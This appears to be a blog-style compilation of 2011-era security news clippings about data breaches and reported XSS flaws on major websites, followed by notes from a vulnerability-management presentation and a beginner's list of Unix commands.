• In April, Sony's PlayStation Network was shut down in April after a massive security breach that affected more than 100 million online accounts.

• Also in April, hackers penetrated a network operated by a data marketing firm Epsilon. The company handles email communications for companies like Best Buy Co. and Target Corp.

The number of data breaches in the last two months sets a "high water mark," said John Ottman, CEO of Application Security Inc., a New York-based firm that specializes in securing databases, the big repositories companies use to organize account information and other data.

"Attackers have realized that most organizations have not properly protected databases," Ottman said.

Cyber attackers have a variety of less-dangerous motivations, from mischief to online activism. For example, a group identifying itself as LulzSec claimed credit for the fake PBS article calling it retaliation for a documentary about WikiLeaks, the website that publishes classified documents.

Reference:

Hackers Attacking Smaller Companies

Hackers are increasingly targeting small and medium-size businesses for cyber attacks, said experts speaking at the Connect Southern California Innovation Conference Thursday in San Diego.

The event featured two panels on cyber security – one geared toward security regulations facing corporate information technology departments and a second focused on what companies can do to protect themselves from cyber attacks.


Reference:

UNC Charlotte: 350,000 SSNs Exposed in Decade-long Data Breach

Two issues exposed financial data and Social Security numbers for 350,000 people, although it is thought the information has not been abused, the University of North Carolina at Charlotte said.

It blamed a system mis-configuration and incorrect access settings for the exposures, which also involved names and addresses of people who had done transactions with the university.The university said in a statement earlier this week that it has fixed both problems, one of which lasted three months and the other more than a decade.


Reference:

FBI Warns Travelers Using Hotel Networks About New Attack

The FBI is warning travelers to be wary of attempts to infect their computers when they log on to hotel networks. In an intelligence note from the FBI’s Internet Crime Complaint Center (IC3), the agency says that attackers have been targeting travelers abroad when they use the Internet connection in their hotel rooms. According to the FBI, when the victims attempted to set up the hotel room Internet connection, they were presented with a pop-up window notifying them to update a "widely used software product."


Reference:

I'm Sure Everything You Do Online Is Safe

...sorry I held my laughter as long as I could. Now let's think about this for a minute. These small yet profitable companies probably have a few more dollars than you for online security and yet they are victims, hmmm...!  ...Butch

F-Secure, McAfee and Symantec websites again XSSed

Written by DP
Friday, 13 January 2012

Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and appear to be working still. They can be triggered on...

Not surprisingly, McAfee websites are susceptible to XSS attacks

Written by DP & KF
Wednesday, 30 March 2011

Famous antivirus vendor McAfee has been all over the news the past few days, regarding cross-site scripting and information disclosure vulnerabilities that affected several of its websites. It all started when...

Secure Amazon Seller Central password reset page XSSed

Written by DP
Wednesday, 13 October 2010
Just another critical cross-site scripting vulnerability has been reported by "See Me" for Amazon Seller Central, a secure website where sellers who signed up for the "Checkout by Amazon" service can view and manage their orders...

EV SSL-secured live PayPal site vulnerable to XSS

Written by DP
Wednesday, 6 October 2010

"d3v1l" from Security-Sh3ll has reported another critical XSS flaw affecting the live PayPal site, where "real money" changes hands... This XSS vulnerability once more undermines the security of Extended Validation SSL (EV SSL) digital certificates...

Persistent XSS bug discovered on eBay

Written by DP
Wednesday, 6 October 2010

Security researcher "Side3ffects" has contacted us regarding a critical persistent XSS that he discovered on eBay... One of the possible exploitation scenarios is malicious people stealing cleartext credentials from registered users by injecting an iframe tag that retrieves another rogue eBay login page from a remote server... 


Reference:

Shifting Sands in Vulnerability Management: the new Strategic Security Platform

Shifting Sands in Vulnerability Management: The New Strategic Security Platform

Just finished a Rapid 7 , excellent.


Topics Covered:

www.nexus.securosis

Platform:

1. Data Model/Engine
2. Analytics
3. Visualzation and Reporting

Core Technologies:

1. Discovery
2. Scanning Networks and Devices
3. Assess Databases & Applications
4. Configuration Assessment
5. Asset Management/Rish Scoring
6. Cloud Computing Impact?
7. SaaS or On-Premise Deployment?

Value Add Tech:

1. Attack Path Analysis
2. Pentration Testing
3. Compliance Automation
4. Patch/Configuration Management
5. Bench marking Exfiltration Analysis


$60 Billion spent in Cyber Security since 2011.
90% of the companies have been hacked since 2005.

Unix Commands

Standard Commands

1. Displaying the Date and Time: The date command
2. Finding Out Who's Logged In: The who command
3. Echoing Characters: The echo command - echo args
4. List Information About Active Processes: The ps Command
5. Display Current Working Directory Path: The pwd Command
6. Sort Lines of file(s) or standard input if not supplied. - sort file(s)
7. Count the Number of Lines Words and Characters in Files(s) or Standard Input if not Supplied - wc file(s)
8. Returns Your Username: The whoami Command
9. Lets you Change Your Password: The passwd Command
10. Shows the Disk Usage of the Files and Directories in Filename - du filename
11. Find Files Anywhere on the System - ff
12. Looks for the String in the Files -  grep string filename(s) 
13. Kills (ends) the Processes With the ID you Gave -  kill PID 
14. Lists Your Last Logins -  last yourusername
15. Tells you who's logged in, and what they're doing - w  
16. Gives you lots of information about that user, e.g. when they last read their mail and whether they're logged in -  finger username
17. Lets You Have a (typed) Conversation with Another User -  talk username
18. Lets You Exchange One-line Messages with Another User - write username
19. Lets you Send E-mail Messages to People Around the World. It's not the only mailer you can use, but the one we recommend - elm

Working With Files

1. Listing Files: The ls Command - ls files
2. Displaying the Contents of a File:The cat Command - cat file(s)
3. Counting the Number of Words in a File: The wc Command
4. Making a Copy of a File: The cp Command - cp file1 file2
5. Renaming a File: The mv Command - mv file1 to file2
6. Removing a File: The rm Command - rm file(s)
7. Links two Files Together - ln file1 to file2
8. Compares Files, and Shows Where They Differ - diff filename1 filename2
9. Lets you Change the Read, Write, and Execute Permissions on Your Files -  chmod options filename 

Working With Directories

1. Displaying Your Working Directory: The pwd Command
2. Changing Directories: The cd Command - cd dir
3. Creating a Directory: The mkdir Command - mkdir dir(s)
4. Linking Files Into Directories: The ln Command - ln file(s) dir
5. Copying a File from One Directory to Another: - cp file(s) dir
6. Moving Files between Directories: mv old file/first directory new file/second Directory - mv file(s) dir
7. Removing a Directory: The rmdir Command - rmdir dir(s)
8. List Files in Directories or in Current Directory if Directories is not Specified. - ls dir(s)

Connecting to the Outside World:

1. Allows you to Read News - nn
2. Lets you Connect to a Remote Host - rlogin hostname
3. Also Lets you Connect to a Remote Host - telnet hostname
4. Lets you Download Files From a Remote Host Which is Set up as an Ftp-Server - ftp hostname
5. Lets you Browse the Web From an Ordinary Terminal - lynx

File Compression:

1. Compresses Files, so That They Take up Much Less Space - gzip filename
2. Uncompresses Files Compressed by gzip - gunzip filename
3. Lets you Look at a gzipped File Without Actually Having to gunzip it (same as gunzip -c) - gzcat filename
4. You can even print it directly, using  - gzcat filename | lpr